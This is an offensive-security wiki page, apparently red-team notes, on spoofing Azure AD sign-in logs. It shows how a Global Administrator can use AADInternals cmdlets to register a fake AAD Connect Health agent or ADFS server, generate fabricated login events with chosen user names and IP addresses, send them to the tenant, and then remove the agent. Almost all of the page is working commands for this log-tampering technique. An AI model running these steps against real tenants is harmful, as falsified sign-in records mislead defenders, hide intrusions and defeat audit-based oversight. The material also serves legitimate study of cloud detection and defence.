Registering Fake Agents for Log Spoofing

We talked about Spoofing AAD Logon logs as a ADFS administrator in Spoofing Azure Sign-In Logs, now we'll see how it's possible to do the same as a Global Administrator on the AAD side.

As a Global Admin we can register our own AAD Connect Health agent

PS /home/otter> New-AADIntHybridHealthService -DisplayName "minions.onmicrosoft.com" -Signature "minions.onmicrosoft.com" -Type AdFederationService

or register a new ADFS server

PS /home/otter> Register-AADIntHybridHealthServiceAgent -ServiceName AdFederationService-minons.onmicrosoft.com -MachineName "<something>" -MachineRole AdfsServer_2016

After this setup part we are, once again, free to generate fake login events

PS /home/otter> $events = @(
>> New-AADIntHybridHealtServiceEvent -Server $agentInfo.Server -UPN "otter1@minions.com" -IPAddress "1.1.1.1" -NetworkLocationType Extranet
>> New-AADIntHybridHealtServiceEvent -Server $agentInfo.Server -UPN "otter2@minions.com" -IPAddress "2.2.2.2" -NetworkLocationType Extranet
>> )
PS /home/otter> Send-AADIntHybridHealthServiceEvents -AgentInfo $agentInfo -Events $events -Verbose

To remove the fake agents we created we can use

PS /home/otter> Remove-AADIntHybridHealthService -ServiceName "<agent_service_name>"
PreviousSpoofing Azure Sign-In LogsNextPass the PRT

Last updated